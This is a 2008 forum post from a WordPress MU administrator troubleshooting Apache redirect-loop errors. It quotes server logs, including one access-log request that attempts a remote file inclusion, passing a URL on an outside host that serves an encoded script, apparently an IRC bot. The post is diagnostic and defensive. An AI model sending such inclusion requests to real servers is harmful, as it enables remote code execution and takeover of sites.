I'm running WPMU 1.3.3, and all seems to work well... Except that every once in a blue moon, Apache gets out of control. I just happened to catch it, and noticed the following:
[Wed Apr 16 00:57:39 2008] [error] [client 67.18.241.218] Request exceeded the l
imit of 10 internal redirects due to probable configuration error. Use 'LimitInt
ernalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get
a backtrace.
Looking for that IP in access_log gives me the following:
67.18.241.218 - - [16/Apr/2008:00:57:39 -0400] "GET /inc/header.php/step_one.php?server_inc=http://blackid.org/do.bo?? HTTP/1.1" 500 603 "-" "libwww-perl/5.65"
(Among others)
The do.bo file is a script of some kind, potentially an IRC bot. (It encodes most of its payload. Since it's not actually getting run, I'm not going to take the time to wade through it.)
Has anyone seen this before? While they don't seem to be actually running their malicious code, it is causing a redirect loop. Has anyone seen this before? I've got a lot of additional RewriteRules, so I wanted to see if this was happening to anyone else (and it's thus a WPMU problem), or if it's just me (and it thus lies with my own mod_rewrite stuff). And in either case, I'm curious exactly what vulnerability they're trying to exploit. I'm surprised they're not getting a 404.